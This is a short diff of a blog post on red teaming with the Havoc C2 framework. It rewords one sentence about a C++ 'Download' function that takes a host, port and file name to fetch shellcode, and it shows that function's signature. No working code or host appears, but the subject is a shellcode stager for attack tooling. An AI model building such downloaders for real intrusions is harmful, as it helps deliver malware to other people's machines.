yl-labs/yl-labs.github.io/_posts/2025-03-18-red-reaming-havoc-c2.md

                 exit(0);
 ```

 * We then create a `Download` function that accepts 3 parameters : `Host` and `Port` and `FileName`.
-Those parameters serve as an indication from where the shellcode must be downloaded.
+Those parameters serve as an indication of the shellcode's whereabouts.

 ```
 std::vector<BYTE> Download(LPCWSTR baseAddress,int port,LPCWSTR filename)